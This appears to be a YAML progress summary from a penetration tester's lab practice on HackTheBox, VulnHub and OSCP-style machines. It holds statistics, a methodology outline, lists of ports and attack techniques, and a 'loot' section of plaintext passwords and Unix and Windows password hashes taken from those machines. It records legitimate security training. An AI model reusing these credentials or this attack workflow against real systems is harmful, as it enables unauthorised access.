summary.yml

summary:
  counts:
    htbnix: 221
    htboscplike: 94
    htbwindows: 82
    oscplikenix: 177
    oscplikewindows: 39
    ownedhtb: 25
    ownedhtbnix: 13
    ownedhtboscplike: 25
    ownedhtbwindows: 12
    ownednix: 37
    ownedoscplike: 46
    ownedoscplikenix: 34
    ownedoscplikewindows: 12
    ownedthm: 1
    ownedthmnix: 0
    ownedthmoscplike: 0
    ownedthmwindows: 0
    ownedtotal: 50
    ownedvh: 24
    ownedvhnix: 24
    ownedvhoscplike: 21
    ownedvhwindows: 0
    ownedwindows: 12
    percent: '14.96'
    percenthtb: '14.89'
    percentnix: '3.28'
    percentthm: '2.63'
    percentvh: '19.67'
    percentwindows: '9.52'
    perhtb: 8.25082508250825
    perhtbnix: 5.88235294117647
    perhtboscplike: 26.595744680851062
    perhtbwindows: 14.634146341463413
    pernix: 3.919491525423729
    peroscplike: 18.11023622047244
    peroscplikenix: 19.2090395480226
    peroscplikewindows: 30.76923076923077
    perthm: 0.1692047377326565
    perthmnix: 0
    perthmoscplike: 0.0
    perthmwindows: 0
    pertotal: 3.0883261272390365
    pervh: 3.310344827586207
    pervhnix: 3.319502074688797
    pervhoscplike: 17.21311475409836
    pervhwindows: 0.0
    perwindows: 14.285714285714285
    thmnix: 0
    thmoscplike: 38
    thmwindows: 0
    total: 0
    totalhtb: 303
    totalnix: 944
    totaloscplike: 254
    totalthm: 591
    totaltotal: 1619
    totalvh: 725
    totalwindows: 84
    vhnix: 723
    vhoscplike: 122
    vhwindows: 2
    writeups: 38
    writeupshtb: 14
    writeupsnix: 31
    writeupsthm: 1
    writeupsvh: 24
    writeupswindows: 8
  loot:
    credentials:
    - credtype: ssh
      password: MEGACORP_4dm1n!!
      username: administrator
    - credtype: sql
      password: M3g4c0rp123
      username: sql_svc
    - credtype: ftp
      password: 8YsqfCTnvxAUeduzjNSXe22
      username: notch
    - credtype: ssh
      password: 8YsqfCTnvxAUeduzjNSXe22
      username: notch
    - credtype: mysql
      password: kEjdbRigfBHUREiNSDs
      username: admin
    - credtype: ssh
      password: raspberry
      username: pi
    - credtype: ssh
      password: '1234567'
      username: fox
    - credtype: webapp
      password: love
      username: rascal
    - credtype: ftp
      password: babygirl_veronica07@yahoo.com
      username: veronica
    - credtype: ftp
      password: ericdoesntdrinkhisownpee
      username: eric
    - credtype: ssh
      password: triscuit*
      username: eric
    - credtype: truecrypt
      password: execrable
      username: null
    - credtype: mysql
      password: thiscannotbeit
      username: john
    - credtype: ssh
      password: princess
      username: anne
    - credtype: wordpress
      password: enigma
      username: john
    - credtype: mysql
      password: meErKatZ
      username: wpdbuser
    - credtype: ssh
      password: GSo7isUM1D4
      username: graham
    - credtype: wordpress
      password: helpdesk01
      username: mark
    - credtype: ssh
      password: '12345'
      username: root
    - credtype: mysql
      password: mysql@12345
      username: mysql
    - credtype: ssh
      password: thisisalsopw123
      username: admin
    - credtype: ssh
      password: LetThereBeFristi!
      username: fristigod
    - credtype: http
      password: keKkeKKeKKeKkEkkEk
      username: eezeepz
    - credtype: webapp
      password: hello
      username: user1
    - credtype: webapp
      password: commando
      username: user2
    - credtype: webapp
      password: p@ssw0rd
      username: user3
    - credtype: webapp
      password: testtest
      username: test
    - credtype: webapp
      password: Uncrackable
      username: superadmin
    - credtype: webapp
      password: testtest
      username: test1
    - credtype: mysql
      password: 3298fj8323j80df!49
      username: admin
    - credtype: mysql
      password: Oscp12345!
      username: wordpress
    - credtype: wordpress
      password: admin:$P$Bx9ohXoCVR5lkKtuQbuWuh2P36Pr1D0
      username: null
    - credtype: mysql
      password: hiroshima
      username: john
    - credtype: webapp
      password: 5afac8d85f
      username: admin
    - credtype: webapp
      password: 66lajGGbla
      username: john
    - credtype: lotuscms
      password: Mast3r
      username: dreg
    - credtype: lotuscms
      password: starwars
      username: loneferret
    - credtype: mysql
      password: fuckeyou
      username: root
    - credtype: ssh
      password: Mast3r
      username: dreg
    - credtype: ssh
      password: starwars
      username: loneferret
    - credtype: liggoat
      password: MyNameIsJohn
      username: john
    - credtype: liggoat
      password: ADGAdsafdfwt4gadfga==
      username: robert
    - credtype: ssh
      password: MyNameIsJohn
      username: john
    - credtype: ssh
      password: ADGAdsafdfwt4gadfga==
      username: robert
    - credtype: ssh
      password: '12345'
      username: togie
    - credtype: mysql
      password: TogieMYSQL12345^^
      username: Admin
    - credtype: wordpress
      password: TogieMYSQL12345^^
      username: admin
    - credtype: ssh
      password: secret
      username: bob
    - credtype: ssh
      password: MySuperS3cretValue!
      username: susan
    - credtype: ssh
      password: P@ssw0rd
      username: insecurity
    - credtype: webapp
      password: iwilltakethering
      username: frodo
    - credtype: webapp
      password: MyPreciousR00t
      username: smeagol
    - credtype: webapp
      password: AndMySword
      username: aragorn
    - credtype: webapp
      password: AndMyBow
      username: legolas
    - credtype: webapp
      password: AndMyAxe
      username: gimli
    - credtype: mysql
      password: darkshadow
      username: root
    - credtype: ssh
      password: MyPreciousR00t
      username: smeagol
    - credtype: ftp
      password: Mellon
      username: Balrog
    - credtype: ssh
      password: spanky
      username: Ori
    - credtype: ssh
      password: abcdefghijklmnopqrstuvwxyz
      username: robot
    - credtype: wordpress
      password: ER28-0652
      username: elliot
    - credtype: ssh
      password: 5AYRft73VtFpc84k
      username: mark
    - credtype: webapp
      password: manchester
      username: myP14ceAdm1nAcc0uNT
    - credtype: webapp
      password: spongebob
      username: tom
    - credtype: webapp
      password: snowflake
      username: mark
    - credtype: ssh
      password: wpadmin
      username: wpadmin
    - credtype: ssh
      password: rootpassword!
      username: root
    - credtype: wordpress
      password: admin
      username: admin
    - credtype: tomcat
      password: submitthisforpoints
      username: tomcat
    - credtype: ssh
      password: letmein
      username: user
    hashes:
    - 'abatchy:$6$xEq/159Q$ScuKnynbwTBdFA4B9w6OqKxQpWPGpofi59McVuP6T1SADKhNy4n33Ovkk0hwZQkx72XriPSIrc2ubr16OEBBn0:17238:0:99999:7:::'
    - 'admin:$6$NPXhvENr$yG4a5RpaLpL5UDRRZ3Ts0eZadZfFFbYpI1kyNJp9rND0AySx2FhYSmAvY.91UzETJVvZcDjWb2pp85uLAli2J/:16757:0:99999:7:::'
    - 'Administrator:500:0a70918d669baeb307012642393148ab:34dec8a1db14cdde2a21967c3c997548:::'
    - 'Administrator:500:c74761604a24f0dfd0a9ba2c30e462cf:d6908f022af0373e9e21b8a241c86dca:::'
    - 'anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::'
    - 'anne:$6$ChsjoKyY$1uHlk7QUSOmdpvSP7Q4PYmE3evwQbUPFp27I4ZdRx/pZp8C8gJAQGu2vy8kwLakYA7cWuZ40aOl2u.8J94U7V.:17595:0:99999:7:::'
    - 'arrexel:$1$mDpVXKQV$o6HkBjhl/e.S.bV96tMm6.:17504:0:99999:7:::'
    - 'ASPNET:1007:3f71d62ec68a06a39721cb3f54f04a3b:edc0d5506804653f58964a2376bbd769:::'
    - 'Balrog:$6$J6kuCfxq$L5ALsHRYfOu0bVV9MbW3.VZOUVEaKSWhfPIq5wXUFV407tpvH8Zx7WdbJeXgdWoPo9LU8eIznf0d44qoFAMn3.:17284:0:99999:7:::'
    - 'billy:$6$eqJNxIDh$oO.ynkHZmLxfr0k8YXHHdbyB4boe2two4HnEiJzzuVEUh0w0paEtVCmHXziHhZIet71QcLqhqnV/iknE/pXdS1:17035:0:99999:7:::'
    - 'bitnamiftp:$6$saPiFTAH$7K09sg5oIfkIs5kuMx1R/Um4HNd8O6vF2n8oICEom8VVer0BYATY5wtzdPdP3JeuKbZ4RYBml0THNQv8TSc0s/:16751:0:99999:7:::'
    - 'bob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::'
    - 'brexit:$6$51s7qYVw$XbTfXEV2acHRp9vmA7VTxO35OLK9EGZJzDGF9nYaukD3eppHsn2P1ESMr.9rRn/YYO70uiUskfkWP0LyRtTiT1:18048:0:99999:7:::'
    - 'crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::'
    - 'doomguy:$6$DWqgg./v$NxqnujIjE8RI.y1u/xiFBPC0K/essEGOfxSF7ovfHG46K6pnetHZNON3sp19rGuoqo26wQkA4B2znRvhqCGQ11:17594:0:99999:7:::'
    - 'dreg:$1$qAc2saWZ$Y567sEs.ql3GMttI6pvoe0:15080:0:99999:7:::'
    - 'eezeepz:$6$djF4bN.s$JWhT7wJo37fgtuJ.be2Q62PnM/AogXuqGa.PgRzrMGv9/Th0aixBXl8Usy9.RkO1ZRAQ/UM3xP7oGWu9zgEIl.:16756:0:99999:7:::'
    - 'eric:$6$b15/PaMU$VKQussKbrXty79HD4A989SVCn.7.u6bJLMvsFgDSgiM01GlyM/lhb1xF0RcX906O6aIMbP7XoVI2F5UzII72i.:17033:0:99999:7:::'
    - 'fristigod:$6$0WqnZlI/$gIzMByP7rH21W3neA.uHYZZg5aM7gI1xtOj8WwgoK1QgQh2LWL0nQBJau/mGcOSxLbaGJhJjM.6HNJTWsaetf0:16758:0:99999:7:::'
    - 'graham:$6$WF7GkVxM$MOL.cXLpG6UTO0M4exCUFwOEiUhW6bwQa.Frg9CerQbTp.EW4QTzEAuio26Aylv.YP0JPAan10tsUFv6kyvRN0:18010:0:99999:7:::'
    - 'Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::'
    - 'hackme:$6$.L285vCy$Hma4mKjGV.sE7ZCFVj2iOkRokX1u3F5DMiTPQFoZPJnQ1kUXLje/bY2BIUQFbYu.8M6BvLML5fAftZOCEVnqa1:17981:0:99999:7:::'
    - 'harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::'
    - 'harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::'
    - 'Harry:1008:93c50499355883d1441208923e8628e6:031f5563e0ac4ba538e8ea325479740d:::'
    - 'IUSR_GRANPA:1003:a274b4532c9ca5cdf684351fab962e86:6a981cb5e038b2d8b713743a50d89c88:::'
    - 'IWAM_GRANPA:1004:95d112c4da2348b599183ac6b1d67840:a97f39734c21b3f6155ded7821d04d16:::'
    - 'jens:$6$JWiFWXb8$cGQi07IUqln/uLLVmmrU9VLg7apOH9IlxoyndELCGjLenxfAaVec5Gjaw2DA0QHRwS9hTB5cI2sg/Wk1OFoAh/:18011:0:99999:7:::'
    - 'john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::'
    - 'john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::'
    - 'john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::'
    - 'john:$6$aoN7zaDl$e6RsRZndFekSS4bgqz0y5dgzO1dTQsMAWck6dFGogkxrrZf1ZyGbjy/oCpqJniIkasXP05iFZHs.XZVIQqZ2w1:17594:0:99999:7:::'
    - 'klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::'
    - 'Lakis:1009:f927b0679b3cc0e192410d9b0b40873c:3064b6fc432033870c6730228af7867c:::'
    - 'loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::'
    - 'loneferret:$1$qbkHf53U$r.kK/JgDLDcXGRC6xUfB11:15079:0:99999:7:::'
    - 'mai:$6$Mp.mBBi7$BCAKb75xSAy8PM6IhjdSOIlcmHvA9V4KnEDSTZAN2QdMUwCwGiwZtwGPXalF15xT097Q6zaXrY6nD/7RsdSiE0:17594:0:99999:7:::'
    - 'makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::'
    - 'mark:$6$//1vISW6$9pl2v8Jg0mNE7E2mgTQlTwZ1zcaepnDyYE4lIPJDdX7ipnxm/muPD7DraEm3z0jqDe5iH/Em2i6YXJpQD.5pl0:18010:0:99999:7:::'
    - 'mark:$6$J3gYK/cQ$au1WmOCtq.X1DTKt1CEmKA9qr4PfwZuAGUdCfAV.SSU5VxAtjW/Xk1/oWJtQVaoXMEVXmeBIB6bq24JpcSRjF0:17408:0:99999:7:::'
    - 'mysql:$6$O2ymBAYF$NZDtY392guzYrveKnoISea6oQpv87OpEjEef5KkEUqvtOAjZ2i1UPbkrfmrHG/IonKdnYEec0S0ZBcQFZ.sno/:18053:0:99999:7:::'
    - 'notch:$6$RdxVAN/.$DFugS5p/G9hTNY9htDWVGKte9n9r/nYYL.wVdAHfiHpnyN9dNftf5Nt.DkjrUs0PlYNcYZWhh0Vhl/5tl8WBG1:17349:0:99999:7:::'
    - 'noulis:$6$ApsLg5.I$Zd9blHPGRHAQOab94HKuQFtJ8m7ob8MFnX6WIIr0Aah6pW/aZ.yA3T1iU13lCSixrh6NG1.GHPl.QbjHSZmg7/:17247:0:99999:7:::'
    - 'Ori:$6$1zYgjEIM$VQ0gvU7JjenS9WuiVjSeva8pbWnEXjqTmEdFnQRXKmTmXPXmt55/oyup40NiXD8J9GxmXF7DYiaHZDRshrs3f1:17237:0:99999:7:::'
    - 'oscp:$6$k8OEgwaFdUqpVETQ$sKlBojI3IYunw8wEDAyoFdHgVtOPzkDPqksql7IWzpfZXpd3UqP569BokTZ52mDroq/rmJY9zgfeQVmBFu/Sf.:18452:0:99999:7:::'
    - 'peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::'
    - 'pi:$6$SQPHFoql$gSE5qWbZRGHDin4LnFY56sMnQsmvH/o2oIlXv.3KcqVsJCYgJ09R9/Pws88e8yjKgJnaxN3zdq8f5ots1bJcY/:17148:0:99999:7:::'
    - 'postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::'
    - 'puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::'
    - 'reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::'
    - 'robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::'
    - 'robot:$6$HmQCDKcM$mcINMrQFa0Qm7XaUaS5xLEBSeP3bUkr18iwgwTAL8AIfUDYBWG5L8J9.Ukb3gVWUQoYam4G0m.I5qaHBnTddK/:16752:0:99999:7:::'
    - 'root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::'
    - root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh
    - 'root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::'
    - 'root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::'
    - 'root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7:::'
    - 'root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::'
    - 'root:$6$.wvqHr9ixq/hDW8t$a/dHKimULfr5rJTDlS7uoUanuJB2YUUkh.LWSKF7kTNp4aL8UTlOk2wT8IkAgJ.vDF/ThSIOegsuclEgm9QfT1:18452:0:99999:7:::'
    - 'root:$6$9xQC1KOf$5cmONytt0VF/wi3Np3jZGRSVzpGj6sXxVHkyJLjV4edlBxTVmW91pcGwAViViSWcAS/.OF0iuvylU5IznY2Re.:16753:0:99999:7:::'
    - 'root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::'
    - 'root:$6$BVgS5ne0$Q6rV3guK7QQUy7uRMwbQ3vv2Y5I9yQUhIzvrIhuiDso/o5UfDxZw7MMq8atR3UdJjhpkFVxVD0cVtjXQdPUAH.:17431:0:99999:7:::'
    - 'root:$6$CM3c1cdI$HbQWZlQdGEWV8yo3j7M84i1/RFK4G7fafTUIUYLWk52zm9O8KRLhqZenF8KbqsUjHlZQk4VmNEeEbBCRjOWbH0:17111:0:99999:7:::'
    - 'root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7:::'
    - 'root:$6$GpmQGQUN$8kLewzMF4ItmxezcryWqSPrXNRTH5TOQFKKkHjK2NSmrTg95xiYi.l8L.RYUL.8pAsj8s4EGvDy4dvENQIqNf.:15585:0:99999:7:::'
    - 'root:$6$kdMFceEg$pk9h93tdD7IomhE7L0Y396HO6fxSM.XDh9dgeBhKpdZlM/WYxCZe7yPRNHfZ5FvNRuILVp2NOsqNmgjoSx/IN0:18012:0:99999:7:::'
    - 'root:$6$L2m6DJwN$p/xas4tCNp19sda4q2ZzGC82Ix7GiEb7xvCbzWCsFHs/eR82G4/YOnni/.L69tpCkOGo5lm0AU7zh9lP5fL6A0:17247:0:99999:7:::'
    - 'root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::'
    - 'root:$6$mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1:18050:0:99999:7:::'
    - 'root:$6$n.BA4A59$WeIF0ZbaB3VGgAxUZqGHnw01.GhL9oVYYFioh07RpPtBl49YdMahhtbYhxUjanXf/NJXiCHBvrNhdC53P1UX2.:17412:0:99999:7:::'
    - 'root:$6$O4bZf1Ju$0xcLPNyQkVcKT0CajZYBOTz4thlujMRjQ7XuFstUDWwYHKmVmJsDmzGXUwYbU1uqr6jxEvX4XJjSUgiwjPmEp0:17399:0:99999:7:::'
    - 'root:$6$P7ElNgGp$fNzyy4OgqSR1ANJXTgbpzp4U42JXG1qJ55iNV10NVJoX5UWjtckWD0oHmcTOj0lqObyWhFu2y3udHVpHaqYxf.:17238:0:99999:7:::'
    - 'root:$6$PnbVvEMS$OcseJT8lZRrgrW1JBpHJ252SPRxS6Rkh3oVBkrbRBZgHBD1wArL6FcyO5daqaon7waFKwSqbg5fIjFgzUVFMS1:18048:0:99999:7:::'
    - 'root:$6$qAoeosiW$fsOy8H/VKux.9K0T3Ww2D3FPNlO5LAaFytx/6t69Q7LPDSS/nNiP4xzq0Qab.Iz3uy5fYdH3Aw/K5v3ZMhRRH0:16756:0:99999:7:::'
    - 'root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7:::'
    - 'sarah:$6$DoSO7Ycr$2GtM5.8Lfx9Sw8X1fDMF.7zWDoVoy1892nyp0iFsqh5CfmtEROtxmejvQxu0N/8D7X8PQAGKYGl.gUb6/cG210:18010:0:99999:7:::'
    - 'scriptmanager:$6$WahhM57B$rOHkWDRQpds96uWXkRCzA6b5L3wOorpe4uwn5U32yKRsMWDwKAm.RF6T81Ki/MOyo.dJ0B8Xm5/wOrLk35Nqd0:17504:0:99999:7:::'
    - 'service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::'
    - 'setup:$6$PR5zOqWk$3MKXMgf6.4bLlznh0R87RB4qaOAcGhbE0Cs8xtUqVPHP8x0553/6aMZnfsZOWKXL0DOqUcVRkfCQN8DvjdZNc1:17086:0:99999:7:::'
    - 'shelly:$6$aYLAoDIC$CJ8f8WSCT6GYmbx7x8z5RfrbTG5mpDkkJkLW097hoiEw3tqei2cE7EcUTYdJTVMSa3PALZeBHjhiFR8Ba5jzf0:17431:0:99999:7:::'
    - 'smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7:::'
    - 'SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:8ed3993efb4e6476e4f75caebeca93e6:::'
    - 'susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::'
    - 'sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::'
    - 'togie:$6$dvOTOc6x$jpt1MVPeBsVlfkhVXl3sv21x2Ls2qle8ouv/JMdR6yNpt2nHHahrh0cyT.8PfVcNqlrAHYFkK2WYdSbxQ4Ivu1:17392:0:99999:7:::'
    - 'tom:$6$ptD/.gN.$n.B/5dODEQFteBwg75Ip9leeaaXSMesGbfZzoVHpZihMHfbWu45UpVZTc6razK1JLZ6817ckZhAJF776Dg/ZJ0:17407:0:99999:7:::'
    - 'user1:$6$9iyn/lCu$UxlOZYhhFSAwJ8DPjlrjrl2Wv.Pz9DahMTfwpwlUC5ybyBGpuHToNIIjTqMLGSh0R2Ch4Ij5gkmP0eEH2RJhZ0:18050:0:99999:7:::'
    - 'user2:$6$7gVE7KgT$ud1VN8OwYCbFveieo4CJQIoMcEgcfKqa24ivRs/MNAmmPeudsz/p3QeCMHj8ULlvSufZmp3TodaWlIFSZCKG5.:18050:0:99999:7:::'
    - 'user3:$6$PaKeECW4$5yMn9UU4YByCj0LP4QWaGt/S1aG0Zs73EOJXh.Rl0ebjpmsBmuGUwTgBamqCCx7qZ0sWJOuzIqn.GM69aaWJO0:18051:0:99999:7:::'
    - 'user4:$6$0pxj6KPl$NA5S/2yN3TTJbPypEnsqYe1PrgbfccHntMggLdU2eM5/23dnosIpmD8sRJwI1PyDFgQXH52kYk.bzc6sAVSWm.:18051:0:99999:7:::'
    - 'user5:$6$wndyaxl9$cOEaymjMiRiljzzaSaFVXD7LFx2OwOxeonEdCW.GszLm77k0d5GpQZzJpcwvufmRndcYatr5ZQESdqbIsOb9n/:18051:0:99999:7:::'
    - 'user6:$6$Y9wYnrUW$ihpBL4g3GswEay/AqgrKzv1n8uKhWiBNlhdKm6DdX7WtDZcUbh/5w/tQELa3LtiyTFwsLsWXubsSCfzRcao1u/:18051:0:99999:7:::'
    - 'user7:$6$5RBuOGFi$eJrQ4/xf2z/3pG43UkkoE35Jb0BIl7AW/umj1Xa7eykmalVKiRKJ4w3vFEOEOtYinnkIRa.89dXtGQXdH.Rdy0:18052:0:99999:7:::'
    - 'user8:$6$fdtulQ7i$G9THW4j6kUy4bXlf7C/0XQtntw123LRVRfIkJ6akDLPHIqB5PJLD4AEyz7wXsEhMc2XC4CqiTxATfb20xWaXP.:18052:0:99999:7:::'
    - 'user:$6$gLVDPSY5$CGHDuEBpkC90vX2xFD9NeJC0O9XfhVj9oFVvL8XbTRpBnt/7WJFpADj0zboPTKTqPbOHafZGUd/exj4OZ1Frc/:15585:0:99999:7:::'
    - 'veronica:$6$ud4650Og$j9dN4Xh6nHTDUQ5LpnrUzl6FdRiapcGvjg0JU2/Wx.G5Q.PFtbv.sa4OJyNnzTVsFEMmgnEZQV1nxGFiy56zS/:17033:0:99999:7:::'
    - 'vulnix:$6$tMOyhDF2$gExhASDVWJqHYn00.A8XLJb.DvE7bdD6NffAno3iY5zEkJwZ4yDTGMrhdVbkMXV1dlBT00DoGFR7oXbtDi3lQ0:15585:0:99999:7:::'
    - 'wpadmin:$6$FtTN/YPC$iidNFmRVpQ1p2kkfoOZ6OzNPqR95DQ/7G10aze2CA2W3ik/sHHyEPaNNY57tMvRDU0/Rs62FEimiKXD2VgEYC1:17096:0:99999:7:::'
    - 'www-data:$6$SYixzIan$P3cvyztSwA1lmILF3kpKcqZpYSDONYwMwplB62RWu1RklKqIGCX1zleXuVwzxjLcpU6bhiW9N03AWkzVUZhms.:17264:0:99999:7:::'
  methodology:
    enumerate:
      goal: to find service and version details
      process:
      - find ttps for open ports
      - start with weird services
      - identify installed software and version
      - find critical cve/exploits
      - enumerate more common services - smb/ftp
      - enumerate services with large attack vector like http at the end
      references:
      - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md
    exploit:
      goal: gain interactive access on <targetip>
      process:
      - debug available exploits for open ports
      references:
      - https://fareedfauzi.github.io/notes/Boot2Root-Notes/
      - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CVE%20Exploits
    privesc:
      goal: gain elevated privileges on <targetip>
      process:
      - debug available exploits or misconfigurations
      - for nix, use [linux smart enum](https://github.com/diego-treitos/linux-smart-enumeration)
      - for windows, use [winpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
      references:
      - https://github.com/rayhan0x01/reverse-shell-able-exploit-pocs
      - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
      - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
    recon:
      goal: to scan all ports on <targetip>
      process:
      - '[enumerate_nmap_initial](#enumerate_nmap_initial)'
      - '[enumerate_nmap_tcp](#enumerate_nmap_tcp)'
      - '[enumerate_nmap_udp](#enumerate_nmap_udp)'
  plot:
    categories:
      hackthebox: 1
      htb: 13
      linux: 31
      oscp: 36
      tryhackme: 1
      vulnhub: 24
      windows: 8
    ports:
      10000/tcp: 1
      1337/tcp: 1
      139/tcp: 4
      1433/tcp: 1
      1974/tcp: 1
      2049/tcp: 2
      21/tcp: 2
      22/tcp: 4
      3000/tcp: 1
      443/tcp: 1
      445/tcp: 1
      80/tcp: 24
      8080/tcp: 3
      9999/tcp: 1
    protocols:
      abyss?: 1
      ftp: 2
      http: 30
      microsoft-ds: 1
      ms-sql-s: 1
      netbios-ssn: 4
      nfs_acl: 2
      ssh: 4
      ssl: 1
    services:
      '2-3 (RPC #100227)': 1
      2.4.18 ((Ubuntu)): 1
      '3 (RPC #100227)': 1
      Apache httpd: 1
      Apache httpd 2.0.52 ((CentOS)): 1
      Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3): 1
      Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8): 2
      Apache httpd 2.2.22 ((Ubuntu)): 2
      Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch): 2
      Apache httpd 2.4.18 ((Ubuntu)): 4
      Apache httpd 2.4.25 ((Debian)): 1
      Apache httpd 2.4.29: 1
      Apache httpd 2.4.29 ((Ubuntu)): 2
      Apache httpd 2.4.34 ((Ubuntu)): 1
      Apache httpd 2.4.41 ((Ubuntu)): 1
      Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6): 1
      Apache httpd 2.4.7 ((Ubuntu)): 3
      HttpFileServer httpd 2.3: 1
      Microsoft IIS httpd 6.0: 2
      Microsoft IIS httpd 7.5: 1
      Microsoft SQL Server 14.00.1000.00: 1
      Microsoft Windows netbios-ssn: 2
      Microsoft ftpd: 1
      Node.js Express framework: 1
      OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0): 1
      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0): 1
      OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0): 1
      OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0): 1
      'Samba smbd 3.X - 4.X (workgroup: WORKGROUP)': 2
      SimpleHTTPServer 0.6 (Python 2.7.3): 1
      Windows Server 2019 Standard 17763 microsoft-ds: 1
      https/Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b: 1
      vsftpd 2.3.5: 1
    ttps:
      enumerate_app_powershell_history: 1
      enumerate_app_wordpress: 5
      enumerate_proto_ftp: 1
      enumerate_proto_http: 5
      enumerate_proto_smb: 1
      enumerate_proto_smb_anonymous_access: 1
      enumerate_proto_sql: 1
      enumerate_proto_sql_ssis_dtsconfig: 1
      enumerate_proto_ssh: 1
      exploit_bash_reverseshell: 1
      exploit_bof: 1
      exploit_cloudme_bof: 1
      exploit_cmdexec: 1
      exploit_command_injection: 1
      exploit_credsreuse: 5
      exploit_defaultcreds: 1
      exploit_ftp_anonymous: 1
      exploit_ftp_web_root: 1
      exploit_gymsystem_rce: 1
      exploit_hfs_cmd_exec: 1
      exploit_iis_asp_reverseshell: 1
      exploit_iis_webdav: 2
      exploit_lotuscms: 1
      exploit_modssl: 1
      exploit_mongodb: 1
      exploit_nfs_rw: 2
      exploit_nodejs: 1
      exploit_pchart: 1
      exploit_php_fileupload: 3
